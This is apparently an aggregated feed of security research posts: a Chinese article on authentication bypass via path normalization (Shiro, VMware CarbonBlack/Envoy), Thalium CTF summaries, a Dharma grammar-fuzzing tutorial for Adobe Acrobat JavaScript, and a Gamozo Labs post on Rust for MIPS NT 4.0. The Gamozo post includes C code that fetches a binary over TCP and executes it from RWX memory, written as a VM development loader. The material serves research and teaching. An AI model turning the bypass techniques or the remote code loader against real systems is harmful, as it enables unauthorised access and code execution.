这里可能会有一个问题，添加了js后缀后是否还能正常匹配到处理类呢？在spring应用里是可以的，默认配置下的spirng configurePathMatch支持添加后缀匹配路由，如果想开启后缀匹配模式，需要手动重写configurePathMatch方法

Identity Security Authentication Vulnerability

四、路径归一化问题

1.简单定义

两套组件或应用对同一个 URI 解析，或者说处理的不一致，导致路径归一化问题的产生。

orange 的 breaking parser logic 在 2018 黑帽大会上的演讲议题，后续许多路径归一化的安全问题，都是延伸自他的 PPT

2.Shiro 权限绕过漏洞

一个很经典的路径归一化问题，导致权限的绕过，比如Shiro CVE-2020-1957

针对用户访问的资源地址，也就是 URI 地址，shiro 的解析和 spring 的解析不一致，shiro 的 Ant 中的*通配符匹配是不能匹配这个 URI 的/test/admin/page/。shiro 认为它是一个路径，所以绕过了/test/admin/*这个 ACL。而 spring 认为/test/admin/page 和/test/admin/page/是一样的，它们能在 spring中获取到同样的资源。

3.CVE-2021-21982 VMware CarbonBlack Workstation

算是一个老1day了，组件本身身份验证通过Spring Security + JWT来实现。且存在两套url的处理组件：Envoy 以及 Springboot。

PS：Envoy 是专为大型现代 SOA（面向服务架构）架构设计的 L7 代理和通信总线。

通过diff可以定位到漏洞点，一个本地获取token的接口

Identity Security Authentication Vulnerability

但是我们通过外网直接访问无法获取到token

Identity Security Authentication Vulnerability

简单了解一下组建的基本架构

Identity Security Authentication Vulnerability

抓一下envoy 与本机服务的通信 rr yyds

./tcpdump -i lo -nn -s0 -w lo1.cap -v

envoy 本身起到一个请求转发作用，可以精确匹配到协议 ip 端口 url路径等，指定很详细的路由转发规则，且可以对请求进行转发和修改

Identity Security Authentication Vulnerability

url编码即可绕过envoy的转发规则，POC如下：

Identity Security Authentication Vulnerability

总结：由于envoy转发规则不能匹配URL编码，但Springboot可以理解，两个组件对url的理解不同，最终导致漏洞产生。

3.Other

扩展一下思路，当存在一个或者多个代码逻辑处理url时，由于对编码，通配符，"/"，";" 等处理的不同，极有可能造成安全问题。

五、Apache、Nginx、Jetty、HAProxy 等

Chybeta在其知识星球分享了很多：

Nginx 场景绕过之一: URL white spaces + Gunicorn

https://articles.zsxq.com/id_whpewmqqocrw.html

Nginx 场景绕过之二：斜杠(trailing slash) 与 #

https://articles.zsxq.com/id_jb6bwow4zf5p.html

Nginx 场景绕过之三：斜杠(trailing slash) 与 ;

https://articles.zsxq.com/id_whg6hb68xkbd.html

HAProxy 场景绕过之一: CVE-2021-40346

https://articles.zsxq.com/id_ftx67ig4w57u.html

利用hop-by-hop绕过：结合CVE-2021-33197

https://articles.zsxq.com/id_rfsu4pm43qno.html

Squid 场景绕过之一: URN bypass ACL

https://articles.zsxq.com/id_ihsdxmrapasa.html

Apache Module mod_proxy 场景绕过：SSRF CVE-2021-4043.

六、简单的fuzz测试

造成权限绕过的根本原因可能有多种，但是不妨碍我们总结出一些常见的绕过方式，编码、插入某些特定字符、添加后缀等方式。远海曾公布一个权限绕过的fuzz字典：

Identity Security Authentication Vulnerability

七、参考链接

https://wx.zsxq.com/dweb2/index/group/555848225184

https://www.vmware.com/security/advisories/VMSA-2021-0005.html

https://cloud.tencent.com/developer/article/1552824

Fuzzing Microsoft's RDP Client using Virtual Channels: Overview & Methodology

THALIUM

10 November 2021 at 12:00

This article begins my three-part series on fuzzing Microsoft’s RDP client. In this first installment, I set up a methodology for fuzzing Virtual Channels using WinAFL and share some of my findings.

ECW 2021 - WriteUp

THALIUM

25 October 2021 at 11:00

For the European Cyber Week CTF 2021 Thalium created some challenges in our core competencies: reverse and exploitation. This blog post presents some of the write-ups:

Chest (36 solve) - reverse
FSB as a service (3 solve) - exploitation
WYSIWYG (3 solve) - reverse
Pipe Dream (1 solve) - reverse
- the author posted his solution on his personal blog

Thalium’s challenges have been less resolved than others. They were not that difficult, but probably a bit more unexpected. A few additional challenges designed by Thalium are:

NT objects access tracing

THALIUM

7 June 2021 at 11:00

Draw me a map As homework during the lockdown, I wanted to automate the attack surface analysis of a target on Windows. The main objective was to construct a view of a software architecture to highlight the attack surface (whether remote or local). The software architecture can be composed of several elements: processes privileges ipc etc Usually, software architecture analysis is done with tools that give a view at a specific time (ProcessHacker, WinObjEx, etc).

SSTIC : how to setup a ctf win10 pwn user environment

THALIUM

2 June 2021 at 14:30

Introduction This post aims to present how to easily setup a lightweight secure user pwning environment for Windows. From your binary challenge communicating with stdin/stdout, this environment provides a multi-client broker listening on a socket, redirecting it to the IO of your binary, and executing it in a jail. This environment is mainly based on the project AppJaillauncher-rs from trailofbits, with some security fixes and some tips to easily setup the RW rights to the system files from the jail.

Cyber Apocalypse 2021 3/5 - Off the grid

THALIUM

28 April 2021 at 11:00

Off-the-grid was the 4th hardware challenge of the Cyber Apocalypse 2021 CTF organized by HackTheBox. We were given an Saleae trace and schematics to analyse. Thalium was one of the very first of 99 players to complete it.

Cyber Apocalypse 2021 5/5 - Artillery

THALIUM

28 April 2021 at 11:00

Artillery was a web challenge of the Cyber Apocalypse 2021 CTF organized by HackTheBox. We were given the source code of the server to help us solve the challenge. This challenge was a nice opportunity to learn more about XXE vulnerabilities.

Cyber Apocalypse 2021 1/5 - PWN challenges

THALIUM

28 April 2021 at 11:00

Thalium participated in the Cyber Apocalypse 2021 CTF organized last week by HackTheBox. It was a great success with 4,740 teams composed of around 10,000 hackers from all over the world. Our team finished in fifth place and solved sixty out of the sixty-two challenges:

This article explains how we solved each pwn challenge and what tools we used, it is written to be accessible to beginners:

Cyber Apocalypse 2021 4/5 - Discovery

THALIUM

28 April 2021 at 11:00

One of the least solved challenges, yet probably not the most difficult one. It is a Hardware challenge, though it is significantly different from the other challenges of this category. The first thing to spot is that when starting the challenge machine, we have access to two network services:

an HTTP server, requesting an authentication
an AMQP broker, rabbitmq

Cyber Apocalypse 2021 2/5 - Wii-Phit

THALIUM

28 April 2021 at 11:00

Wii-Phit was the only Hard crypto challenge designed by CryptoHack for the Cyber Apocalypse 2021 CTF (there were also 4 challenges categorized as Insane though).

There is already an excellent writeup by the challenge organizers: one could recognize a well known equation related to the Erdős–Straus conjecture, some participants used Z3. We took a different approach.

Windows Memory Introspection with IceBox

THALIUM

22 June 2020 at 11:00

Virtual Machine Introspection (VMI) is an extremely powerful technique to explore a guest OS. Directly acting on the hypervisor allows a stealth and precise control of the guest state, which means its CPU context as well as its memory. Basically, a common use case in VMI consists in (1) setting a breakpoint on an address, (2) wait for a break and (3) finally read some virtual memory. For example, to simply monitor the user file writing activity on Windows, just set a breakpoint on the NtWriteFile function in kernel land.

Getting Started with Icebox VMI

THALIUM

24 January 2020 at 11:00

Icebox is a VMI (Virtual Machine Introspection) framework enabling you to stealthily trace and debug any kernel or user code system-wide. All Icebox source code can be found on our github page. Try Icebox Icebox now comes with full Python bindings enabling fast prototyping on top of VMI, whether you want to trace a user process or inspect the kernel internals. The core itself is in C++ and exposes most of its public functions into an icebox Python 3 module.

Introduction to Dharma - Part 1

Haboob

Haboob Research Team

16 November 2021 at 12:28

While targeting Adobe Acrobat JavaScript APIs, we were not only focusing on performance and the number of cases generated per second, but also on effective generation of valid inputs that cover different functionalities and uncover new vulnerabilities.

Obtaining inputs from mutational-based input generators helped us in quickly generating random inputs; however due to the randomness of the mutations that were generated, great majority of that input was invalid.

So, we utilized a well-known grammar-based input generator called Dharma to produce inputs that are semantically reasonable and follow the syntactic rules of JavaScript.

In this blog post, we will explain what Dharma is, how to set it up and finally demonstrate how to use it to generate valid Adobe Acrobat JavaScript API calls which can be wrapped in PDF file format.

So, What is dharma?

Dharma was created by Mozilla in 2015. It's a tool used to create test cases for fuzzing of structured text inputs, such as markup and script. Dharma takes a custom high-level grammar format as input and produces random well-formed test cases as output.

Dharma can be installed from the following GitHub repo.

Why use Dharma?

By using Dharma, a fuzzer can generate inputs that are valid according to that grammar requirements. To generate an input using Dharma, the input model must be stated. It will be difficult to write a grammar files for a model that is proprietary, unknown, or very complex.

However, we do have knowledge of APIs and objects that we're targeting, by using the publicly available JavaScript API documentation provided by Adobe.

How to use Dharma?

Using dharma is straight forward, it takes a grammar file with dg extension and starts generating random inputs based on the grammar file that is provided.

A grammar file generally needs to contain 3 sections, and they are:

Value
Variable
Variance

Note that the Variable section is not mandatory. Each section has a purpose and specifications,

The syntax to declare a section: %section% := section

The "value" section is where we define values that are interchangeable - think of it as an OR/SWITCH.

a value can be referenced in the grammar file using +value+, for example +cName+.

The "variable" section is where we define variables to be used as a context to be used in generating different code.

a variable can be referenced from the value section by using two exclamation marks

The "variance" section is where we put everything together.

if we run the previous example of the three sections, one of the generated files will be similar to the following JS code:

Building Grammar Files

In this section we'll walk through an example of how to build a grammar file based on a real life scenario. We will try to build a grammar file for the Thermometer object from Adobe javascript documentation.

%section% := variable

The Thermometer objects can be referenced through "app.thermometer" - which is the first thing we need to implement:

The easiest way to get a reference to the Thermometer object is from the app object (app.therometer):

%section% := value

Looking at the documentation of the Thermometer object, we can see that it has four properties:

We need to assign values properties based on their types.

In this case, the cancelled property's type is a boolean, Duration is number, text is a string and the value property is a number. That said, we'll have to implement getters and setters for these properties. The setter implementation should look similar to the following:

Now that we have implemented setters for the properties, Dharma will pick random setter definition from the defined therometer_setters.

For the value property, it will set a random number using +common:number+, a random character for the text property using +common:character+, a random number from 0 to 10000 for the duration property and a Boolean value for the cancelled property using +common:bool+.

Those values were referenced from a grammar file shipped with dharma called common.dg.

We're now done with the setters, next up is implementing the getters which is fairly easy. We can create a value with all the properties, and then another value to pick a random property from thermometer_properties:

In the above grammar we used x+common:digit+ to generate random JavaScript variables to store the properties values in it, for example, x1, x2, x3, …etc.

We're officially done with properties. Next we'll have to implement the methods. The Thermometer object has two methods - begin and end. Luckily, those two functions do not require any arguments passed:

We have everything implemented. One last thing we need to implement in the value section is the wrapper. The wrapper simply try/catch's the code generated:

Finally the variance section - which invokes the wrapper from the main:

%section% := variance

Putting it all together:

Running our grammar file, generates the following output:

The generated JS code can be then embedded into PDF files for testing. Or we can dump the generated code to a JS file by using ">>" from the cmd

Now let's move on to a more complex example - building a grammar file for the spell object.

We will use the same methodology we used above, starting with implementing getters/setters for the properties followed by implementing the methods. Looking at the documentation of the spell object properties:

%section% := value

Note that we will constantly use +fuzzlogics+ keyword, which is a reference from another grammar file that our fuzzer will use to place some random values.

In this case, we'll make the getter/setter implementation simpler. We'll have the setter set random values to any properties regardless of the type. The getter is almost the same as the example above:

Now we're going to implement the methods. To avoid spoiling the fun for you, we'll not implement all the methods in the spell object, just a few for demonstration purposes :)

These are all the methods for the spell object, each method takes a certain number of arguments with different types, so we need a value for each method. Let's start with spell.addDictionary() arguments:

Looking at addDictionary method, it takes three arguments, cFile, cName and bShow. The last argument (bShow) is optional, so we implemented two logics for addDictionary arguments to cover as many scenarios as we can. One with all three arguments and another with only two arguments since the last one is optional.

For the cFile argument, we're referencing an ASCII Unicode value from the fuzzlogics.dg (the dictionary we customly implemented for this purpose).

Now let's implement the spell.check() arguments.

spell.check() function takes two optional arguments, aDomain and aDictionary. So we can either pass aDomain only, aDictionary only, both or no arguments at all.

The first logic "{}" is no argument, the second one is both aDictionary and aDomain, the third one is aDomain, the last one is aDictionary only.

The same methodology is used for the rest of the methods, so we're not going to cover all available methods. The last thing we need to implement is the wrapper:

As we mentioned earlier, the wrapper is used to wrap everything between a try/catch so that any error would be suppressed. Finally, the variance section:

In the next part we will expand further into Dharma, focusing on a specific case study where Dharma was essential to the process of vulnerability discovery. Hopefully this introduction catches you up to speed with grammar fuzzing and its inner workings.

As always, happy hunting :)

Rust on MIPS64 Windows NT 4.0

Gamozo Labs Blog

16 November 2021 at 07:00

Introduction

Some part of me has always been fascinated with coercing code to run in weird places. I scratch this itch a lot with my security research projects. These often lead me to writing shellcode to run in kernels or embedded hardware, sometimes with the only way being through an existing bug.

For those not familiar, shellcode is honestly hard to describe. I don’t know if there’s a very formal definition, but I’d describe it as code which can be run in an environment without any external dependencies. This often means it’s written directly in assembly, and directly interfaces with the system using syscalls. Usually the code can be relocated and often is represented as a flat image rather than a normal executable with multiple sections.

To me, this is extra fun as it’s effectively like operating systems development. You’re working in an environment where you need to bring most of what you need along with you. You probably want to minimize the dependencies you have on the system and libraries to increase compatibility and flexibility with the environments you run. You might have to bring your own allocator, make your own syscalls, maybe even make a scheduler if you are really trying to minimize impact.

Some of these things may seem silly, but when it comes to bypassing anti-viruses, exploit detection tools, and even mitigations, often the easiest thing to do is just avoid the common APIs that are hooked and monitored.

Streams

Before we get into it, it’s important to note that this work has been done over 3 different live streams on my Twitch! You can find these archived on my YouTube channel. Everything covered in this blog can be viewed as it happened in real time, mistakes, debugging, and all!

The 3 videos in question are:

Day 1 - Getting Rust running on Windows NT 4.0 MIPS64

Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS

Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying

Source

This project has spun off 3 open-source GitHub repos, one for the Rust on NT MIPS project in general, another for converting ELFs to flat images, and a final one for parsing .DBG symbol files for applying symbols to Binary Ninja or whatever tool you want symbols in! I’ve also documented the commit hashes for the repos as of this writing if things have changed since you’ve read this!

Rust on NT MIPS - 2028568

ELF loader - 30c77ca

DBG COFF parser - b7bcdbb

Don’t forget to follow me on socials and like and subscribe of course. Maybe eventually I can do research and education full time!~ Oh, also follow me on my Twitter @gamozolabs

MIPS on Windows NT

Windows NT actually has a pretty fascinating history of architecture support. It supported x86 as we know and love, but additionally it supported Alpha, ARM, and PowerPC. If you include the embedded versions of Windows there’s support for some even more exotic architectures.

MIPS is one of my favorite architectures as the simplicity makes it really fun to develop emulators for. As someone who writes a lot of emulators, it’s often one of my first targets during development, as I know it can be implemented in less than a day of work. Finding out that MIPS NT can run in QEMU was quite exciting for me. The first time I played around with this was maybe ~5 years ago, but recently I thought it’d be a fun project to demonstrate harnessing of targets for fuzzing. Not only does it have some hard problems in harnessing, as there are almost no existing tools for working with MIPS NT binaries, but it also leads us to some fun future projects where custom emulators can come into the picture!

There’s actually a fantastic series by Raymond Chen which I highly recommend you check out here.

There’s actually a few of these series by Raymond for various architectures on NT. They definitely don’t pull punches on details, definitely a fantastic read!

Running Windows NT 4.0 MIPS in QEMU

Getting NT 4.0 running in QEMU honestly isn’t too difficult. QEMU already supports the magnum machine, which runs on a R4000 MIPS processor, the first 64-bit MIPS processor, running an implementation of the MIPS III ISA. Unfortunately, out of the box it won’t quite run, as you need a BIOS/bootloader capable of booting Windows, maybe it’s video BIOS, I don’t know. You can find this here. Simply extract the file, and rename NTPROM.RAW to mipsel_bios.bin.

Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s a bit of configuration you need to do in the BIOS to get it to detect your CD, and you need to configure your MAC address otherwise networking in NT doesn’t seem to work beyond a DHCP lease. Anyways, you can find more details about getting MIPS NT 4.0 running in QEMU here.

I also cover the process I use, and include my run.sh script here.

#!/bin/sh

ISO="winnt40wks_sp1_en.iso"
#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"

qemu-system-mips64el \
    -M magnum \
    -cpu VR5432 \
    -m 128 \
    -net nic \
    -net user,hostfwd=tcp::5555-:42069 \
    -global ds1225y.filename=nvram \
    -global ds1225y.size=8200 \
    -L . \
    -hda nt4.qcow2 \
    -cdrom "$ISO"

Windows NT 4.0 running in QEMU MIPS

Getting code running on Windows NT 4.0

Surprisingly, a decent enough environment for development is readily available for NT 4.0 on MIPS. This includes symbols (included under SUPPORT/DEBUG/MIPS/SYMBOLS on the original ISO), as well as debugging tools such as ntsd, cdb and mipskd (command-line versions of the WinDbg command interface you may be familiar with), and the cherry on top is a fully working Visual Studio 4.0 install that will work right inside the MIPS guest!

With Visual Studio 4.0 we can use both the full IDE experience for building projects, but also the command line cl.exe compiler and nmake, my preferred Windows development experience. I did however use VS4 for the editor as I’m not using 1996 notepad.exe for writing code!

Unless you’re doing something really fancy, you’ll be surprised to find much of the NT APIs just work out of the box on NT4. This includes your standard way of interacting with sockets, threads, process manipulation, etc. A few years ago I wrote a snapshotting tool that used all the APIs that I would in a modern tool to dump virtual memory regions, read them, and read register contexts. It’s pretty neat!

Nevertheless, if you’re writing C or C++, other than maybe forgetting about variables having to be declared at the start of a scope, or not using your bleeding edge Windows 10 APIs, it’s really no different from modern Windows development. At least… for low level projects.

Rust and Me

After about ~10 years of writing -ansi -pedantic C, where I followed all the old fashioned rules of declaring variables at the start of scopes, verbose syntax, etc, I never would have thought I would find myself writing in a higher-level language. I dabbled in C++ but I really didn’t like the abstractions and confusion it brought, although that was arguably when I was a bit less experienced.

Nevertheless, I found myself absolutely falling in love with Rust. This was a pretty big deal for me as I have very strong requirements about understanding exactly what sort of assembly is generated from the code I write. I spend a lot of time optimizing and squeezing every bit of performance out of my code, and not having this would ruin a language for me. Something about Rust and its model of abstractions (traits) makes it actually pretty obvious what code will be generated, even for things like generics.

The first project I did in Rust was porting my hobby OS to it. Definitely a “thrown into the deep end” style project, but if Rust wasn’t suitable for operating systems development, it definitely wasn’t going to be a language I personally would want to invest in. However… it honestly worked great. After reading the Rust book, I was able to port my OS which consisted of a small hypervisor, 10gbit networking stack, and some fancy memory management, in less than a week.

Anyways, rant aside, as a low-level optimization nerd, there was nothing about Rust, even in 2016, that raised red flags about being able to replace all of my C in it. Of course, I have many complaints and many things I would change or want added to Rust, but that’s going to be the case with any language… I’m picky.

Rust on MIPS NT 4.0

Well, I do all of my projects in Rust now. Even little scripts I’d usually write in Python I often find myself grabbing Rust for. I’m comfortable with using Rust for pretty much any project at this point, that I decided that for a long-ish term stream project (ultimately a snapshot fuzzer for NT), I would want to do this in Rust.

The very first thought that comes to mind is to just build a MIPS executable from Rust, and just… run it. Well, that would be great, but unfortunately there were a few hiccups.

Rust on weird targets

Rust actually has pretty good support for weird targets. I mean, I guess we’re really just relying on, or limited by cough, LLVM. Not only can you simply pick your target by the --target triple argument to Rust and Cargo, but also when you really need control you can define a target specification. This gives you a large amount of control about the code generated.

For example:

pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json

Will give you the JSON spec for my native system, x86_64-unknown-linux-gnu

{
  "arch": "x86_64",
  "cpu": "x86-64",
  "crt-static-respected": true,
  "data-layout": "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128",
  "dynamic-linking": true,
  "env": "gnu",
  "executables": true,
  "has-elf-tls": true,
  "has-rpath": true,
  "is-builtin": true,
  "llvm-target": "x86_64-unknown-linux-gnu",
  "max-atomic-width": 64,
  "os": "linux",
  "position-independent-executables": true,
  "pre-link-args": {
    "gcc": [
      "-m64"
    ]
  },
  "relro-level": "full",
  "stack-probes": {
    "kind": "call"
  },
  "supported-sanitizers": [
    "address",
    "cfi",
    "leak",
    "memory",
    "thread"
  ],
  "target-family": [
    "unix"
  ],
  "target-pointer-width": "64"
}

As you can see, there’s a lot of control you have here. There’s plenty more options than just in this JSON as well. You can adjust your ABIs, data layout, calling conventions, output binary types, stack probes, atomic support, and so many more. This JSON can be modified as you need and you can then pass in the JSON as --target <your target json.json> to Rust, and it “just works”.

I’ve used this to generate code for targets Rust doesn’t support, like Android on MIPS (okay there’s maybe a bit of a pattern to my projects here).

Back to Rust on MIPS NT

Anyways, back to Rust on MIPS NT. Lets just make a custom spec and get LLVM to generate us a nice portable executable (PE, the .exe format of Windows)!

Should be easy!

Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran into an LLVM bug.

It took us some time (well, Twitch chat eventually read the LLVM code instead of me guessing) to find that the correct target triple if we wanted to get LLVM to generate a PE for MIPS would be mips64el-pc-windows-msvccoff. It’s a weird triple (mainly the coff suffix), but this is the only path we were able to find which would cause LLVM to attempt to generate a PE for MIPS. It definitely seems a bit biased towards making an ELF, but this triple indeed works…

It works at getting LLVM to try to emit a PE, but unfortunately this feature is not implemented. Specifically, inside LLVM they will generate the MIPS code, and then attempt to create the PE by calling createMCObjectStreamer. This function doesn’t actually check any of the function pointers before invoking them, and it turns out that the COFF streamer defaults to NULL, and for MIPS it’s not implemented.

Thus… we get a friendly jump to NULL:

LLVM crash backtrace in GDB

Can we add support?

The obvious answer is to quickly take the generic implementation of PE generation in LLVM and make it work for MIPS and upstream it. Well, after a deep 30 second analysis of LLVM code, it looks like this would be more work than I wanted to invest, and after all the issues up to this point my concerns were that it wouldn’t be the end of the problems.

I guess we have ELFs

Well, that leaves us with really one format that LLVM will generate MIPS for us, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I decided the best way to go would simply be to flatten the ELF into an in-memory representation and make my own file format that’s easy to write a loader for.

You might think to just use a linker script for this, or to do some magic objcopy to rip out code, but unfortunately both of these have limitations. Linker scripts are fail-open, meaning if you do not specify what happens with a second, it will just “silently” be added wherever the linker would have put it by default. There (to my knowledge) is no strict mode, which means if Rust or LLVM decide to emit some section name you are not expecting, you might end up with code not being laid out as you expect.

objcopy cannot output zero-initialized BSS sections as they would be represented in-memory, so once again, this leads to an unexpected section popping up and breaking the model you expected.

Of course, with enough effort and being picky you can get a linker script to output whatever format you want, but honestly they kinda just suck to write.

Instead, I decided to just write an ELF flattener. It wouldn’t handle relocations, imports, exports, permissions or really anything. It wouldn’t even care about the architecture of the ELF or the payload. Simply, go through each LOAD section, place them at their desired address, and pad the space between them with zeros. This will give a flat in-memory representation of the binary as it would be loaded without relocations. It doesn’t matter if there’s some crazy custom assembly or sections defined, the LOAD sections are all that matters.

This tool is honestly relatively valuable for other things, as it can also flatten core dumps into a flat file if you want to inspect a core dump, which is also an ELF, with your own tooling. I’ve written this ELF loader a handful of times that I thought it would be worthwhile writing my best version if this.

The loader simply parses the absolutely required information from the ELF. This includes checking \x7FELF magic, reading the endianness (affects the ELF integer endianness), and the bitness (also affects ELF layout). Any other information in the header is ignored. Then I parse the program headers, look for any LOAD sections (sections indicated by the ELF to be loaded into memory) and make the flat file.

The ELF format is fairly simple, and the LOAD sections contain information about the permissions, virtual address, virtual size (in-memory size), file offset (location of data to initialize the memory to), and the file size (can often be less than the memory size, thus any uninitialized bytes are padded to virtual memory size with zeros).

By concatenating these sections with the correct padding, viola, we have an in-memory representation of the ELF.

I decided to make a custom FELF (“Falk ELF”) format that indicated where this blob need to be loaded into memory, and the entry point address that needed to be jumped into to start execution.

FELF0001 - Magic header
entry    - 64-bit little endian integer of the entry point address
base     - 64-bit little endian integer of the base address to load the image
<image>  - Rest of the file is the raw image, to be loaded at `base` and jumped
           into at `entry`

Simple! You can find the source code to this tool at My GitHub for elfloader. This tool also has support for making a raw file, and picking a custom base, not for relocations, but for padding out the image. For example, if you have the core dump of a QEMU guest, you can run it through this tool with elfloader --binary --base=0 <coredump> and it will produce a flat file with no headers representing all physical memory with MMIO holes and gaps padded with zero bytes. You can then mmap() the file and write your own tools to browse through a guests physical memory (or virtual if you write page table walking code)! Maybe this is a problem I only find myself running into often, but within a few days of writing this I’ve even had a coworker use it.

Anyways, enough selling you on this first cool tool we produced. We can turn an ELF into an in-memory initial representation, woohoo.

FELF loader

To load a FELF for execution on Windows, we’ll of course need to write a loader. Of course we could convert the FELF into a PE, but at this point it’s less effort for us to just use the VC4.0 installation in our guest to write a very tiny loader. All we have to do is read a file, parse a simple header, VirtualAlloc() some RWX memory at the target address, copy the payload to the memory, and jump to entry!

Unfortunately, this is where it started to start to get dicey. I don’t know if it’s my window manager, QEMU, or Windows, but very frequently my mouse would start randomly jumping around in the VM. This meant that I pretty much had to do all of my development and testing in the VM with only the keyboard. So, we immediately scrapped the idea of loading a FELF from disk, and went for network loading.

Remote code execution

As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we learned the hard way that non-unicast MAC addresses randomly generated by DuckDuckGo indeed fail in a very hard to debug way), we had access to our host machine (and the internet) in the guest.

Why load from disk which would require shutting down the VM to mount the disk and copy the file into, when we could just make this a remote loader. So, that’s what we did!

We wrote a very simple client that when invoked, would connect to the server, download a FELF, load it, and execute it. This was small enough that developing this inside the VM in VC4.0 was totally fine.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	unsigned int len;
	unsigned char *buf;
	unsigned int off = 0;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("192.168.1.2");
	sockaddr.sin_port = htons(1234);

	// Connect to the socket
	if(connect(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "connect() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload length
	if(recv(sock, (char*)&len, sizeof(len), 0) != sizeof(len)) {
		fprintf(stderr, "recv() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload
	buf = malloc(len);
	if(!buf) {
		perror("malloc() error ");
		return -1;
	}

	while(off < len) {
		int bread;
		unsigned int remain = len - off;
		bread = recv(sock, buf + off, remain, 0);
		if(bread <= 0) {
			fprintf(stderr, "recv(pl) error : %d", WSAGetLastError());
			return -1;
		}

		off += bread;
	}

	printf("Read everything %u\n", off);

	// FELF0001 + u64 entry + u64 base
	if(len < 3 * 8) {
		fprintf(stderr, "Invalid FELF\n");
		return -1;
	}

	{
		char *ptr = buf;
		unsigned int entry, base, hi, end;

		if(memcmp(ptr, "FELF0001", 8)) {
			fprintf(stderr, "Missing FELF header\n");
			return -1;
		}
		ptr += 8;

		entry = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		base = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		end = base + (len - 3 * 8);
		printf("Loading at %x-%x (%x) entry %x\n", base, end, end - base, entry);

		{
			unsigned int align_base = base & ~0xffff;
			unsigned int align_end  = (end + 0xffff) & ~0xffff;
			char *alloc = VirtualAlloc((void*)align_base,
				align_end - align_base, MEM_COMMIT | MEM_RESERVE,
				PAGE_EXECUTE_READWRITE);
			printf("Alloc attempt %x-%x (%x) | Got %p\n",
				align_base, align_end, align_end - align_base, alloc);
			if(alloc != (void*)align_base) {
				fprintf(stderr, "VirtualAlloc() error : %d\n", GetLastError());
				return -1;
			}

			// Copy in the code
			memcpy((void*)base, ptr, end - base);
		}

		// Jump to the entry
		((void (*)(SOCKET))entry)(sock);
	}

	return 0;
}

It’s not the best quality code, but it gets the job done. Nevertheless, this allows us to run whatever Rust program we develop in the VM! Running this client executable is all we need now.

Remote remote code execution

Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly a lot more than I want to have in my build process. I kind of think any build, dev, and test cycle that takes longer than a few seconds is just too painful to use. I don’t really care how complex the project is. In Chocolate Milk I demonstrated that I could build, upload to my server, hot replace, download Windows VM images, and launch hundreds of Windows VMs as part of my sub-2-second build process. This is an OS and hypervisor with hotswapping and re-launching of hundreds of Windows VMs in seconds (I think milliseconds for the upload, hot swap, and Windows VM launches if you ignore the 1-2 second Rust build). There’s just no excuse for shitty build and test processes for small projects like this.

Okay, very subtle flex aside, we need a better process. Luckily, we can remotely execute our remote code. To do this I created a server that runs inside the guest that waits for connections. On a connection it simply calls CreateProcess() and launches the client we talked about before. Now, we can “poke” the guest by simply connecting and disconnecting to the TCP port we forwarded.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d\n", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
	sockaddr.sin_port = htons(42069);

	if(bind(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "bind() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Listen for connections
	if(listen(sock, 5) == SOCKET_ERROR) {
		fprintf(stderr, "listen() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Wait for a client
	for( ; ; ) {
		STARTUPINFO si = { 0 };
		PROCESS_INFORMATION pi = { 0 };
		SOCKET client = accept(sock, NULL, NULL);

		// Upon getting a TCP connection, just start
		// a separate client process. This way the
		// client can crash and burn and this server
		// stays running just fine.
		CreateProcess(
			"client.exe",
			NULL,
			NULL,
			NULL,
			FALSE,
			CREATE_NEW_CONSOLE,
			NULL,
			NULL,
			&si,
			&pi
		);

		// We don't even transfer data, we just care about
		// the connection kicking off a client.
		closesocket(client);
	}

	return 0;
}

Very fancy code. Anyways with this in place, now we can just add a nc -w 0 127.0.0.1 5555 to our Makefile, and now the VM will download and run the new code we build. Combine this with cargo watch and now when we save one of the Rust files we’re working on, it’ll build, poke the VM, and run it! A simple :w and we have instant results from the VM!

(If you’re wondering, we create the client in a different process so we don’t lose the server if the client crashes, which it will)

Rust without OS support

Rust is designed to have a split of some of the core features of the language. There’s core which contains the bare essentials to have a usable language, alloc which gives you access to dynamic allocations, and std which gives you a OS-agnostic wrapper of common OS-level constructions like files, threads, and sockets.

